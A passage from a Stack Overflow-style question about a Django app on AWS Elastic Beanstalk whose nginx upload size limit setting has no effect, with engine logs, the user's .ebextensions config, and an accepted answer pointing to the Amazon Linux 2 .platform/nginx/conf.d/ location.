2020/08/31 15:40:03.419929 [INFO] Running command /bin/sh -c tail -n 100 /var/log/nginx/access.log
2020/08/31 15:40:03.421444 [INFO] Running command /bin/sh -c tail -n 100 /var/log/nginx/error.log
2020/08/31 15:40:03.505034 [INFO] Executing cleanup logic
2020/08/31 15:40:03.505123 [INFO] CommandService Response: {"status":"SUCCESS","api_version":"1.0","results":[{"status":"SUCCESS","msg":"Engine execution has succeeded.","returncode":0,"events":[{"msg":"Instance deployment completed successfully.","timestamp":1598888403,"severity":"INFO"}]}]}

2020/08/31 15:40:03.505143 [INFO] Platform Engine finished execution on command: tail-log

2020/09/08 21:28:16.914466 [INFO] Starting...
2020/09/08 21:28:16.914517 [INFO] Starting EBPlatform-PlatformEngine
2020/09/08 21:28:16.914533 [INFO] reading event message file
2020/09/08 21:28:16.914638 [INFO] no eb envtier info file found, skip loading env tier info.
2020/09/08 21:28:16.914704 [INFO] Engine received EB command cfn-hup-exec

2020/09/08 21:28:17.007638 [INFO] Running command /bin/sh -c /opt/aws/bin/cfn-get-metadata -s arn:aws:cloudformation:us-west-2:719930975199:stack/awseb-e-kagvpnbvff-stack/2e434ba0-eb98-11ea-a9bf-0ae10a278694 -r AWSEBAutoScalingGroup --region us-west-2
2020/09/08 21:28:17.364703 [INFO] Running command /bin/sh -c /opt/aws/bin/cfn-get-metadata -s arn:aws:cloudformation:us-west-2:719930975199:stack/awseb-e-kagvpnbvff-stack/2e434ba0-eb98-11ea-a9bf-0ae10a278694 -r AWSEBBeanstalkMetadata --region us-west-2
2020/09/08 21:28:17.662020 [INFO] checking whether command tail-log is applicable to this instance...
2020/09/08 21:28:17.662035 [INFO] this command is applicable to the instance, thus instance should execute command
2020/09/08 21:28:17.662039 [INFO] Engine command: (tail-log)

2020/09/08 21:28:17.662107 [INFO] Executing instruction: GetTailLogs
2020/09/08 21:28:17.662115 [INFO] Tail Logs...
2020/09/08 21:28:17.662343 [INFO] Running command /bin/sh -c tail -n 100 /var/log/web.stdout.log
2020/09/08 21:28:17.663932 [INFO] Running command /bin/sh -c tail -n 100 /var/log/nginx/access.log
2020/09/08 21:28:17.665404 [INFO] Running command /bin/sh -c tail -n 100 /var/log/nginx/error.log
2020/09/08 21:28:17.666892 [INFO] Running command /bin/sh -c tail -n 100 /var/log/eb-engine.log
```

Here is my django.config file:

```
option_settings:
  aws:elasticbeanstalk:application:environment:
    DJANGO_SETTINGS_MODULE: "mysite.settings"
    "PYTHONPATH": "/opt/python/current/app/mysite:$PYTHONPATH"
  aws:elasticbeanstalk:container:python:
    WSGIPath: mysite.wsgi:application
container_commands:
  pytorch_install:
    command: "sudo apt-get update"
    command: "sudo apt-get install -y libgl1-mesa-glx"
    command: "pip install --no-cache-dir torch"
    command: "echo HERERERERERERERERE"
    command: "pip install --no-cache-dir efficientnet_pytorch"
    command: "pip install efficientnet_pytorch"
  01_setup_dir:
    command: "mkdir /home"
    command: "chmod -R 777 /home"
  03_install_cv:
    command: "sudo apt-get update"
    command: "sudo apt-get install -y libsm6 libxext6 libxrender-dev"
    command: "pip3 install opencv-python"
  04_check_cv:
    command: "pip install opencv-python"
    command: "pip freeze"
files:
  "/etc/httpd/conf.d/wsgi_custom.conf":
    mode: "000644"
    owner: root
    group: root
    content: |
      WSGIApplicationGroup %{GLOBAL}
  "/etc/nginx/conf.d/proxy.conf":
    mode: "000755"
    owner: root
    group: root
    content: |
      client_max_body_size "100M";
```

I read many posts that fixed the same problem by including creating a file to change the max file size to something larger, which i tried at the end of the config file. But, it did not work. If there is any more information I can provide, I would be happy too! Thank you in advance :)

Comment: Do you have Nginx for your application server? Can you please post the config for that?

Comment: Do you know what's causing the "uninitialized "year" variable while logging request" in your error log? I've been getting them for a while and this is the only S/O question I can find that mentions them.

Comment: @RyanSoderberg I don't unfortunately :( I'll let you know if I ever find out why!

Answer (score 8, accepted):

The `nginx` setting you are trying to use (`/etc/nginx/conf.d/proxy.conf`) is for **Amazon Linux 1**.

Since you are probably using **Amazon Linux 2** you should be using different files for customizing `nginx`. For AL2, the `nginx` settings should be in `.platform/nginx/conf.d/`, not in `.ebextentions` as shown in the [docs](https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/platforms-linux-extend.html).

Therefore, you could have the following `.platform/nginx/conf.d/myconfig.conf` with content:

```
client_max_body_size 100M;
```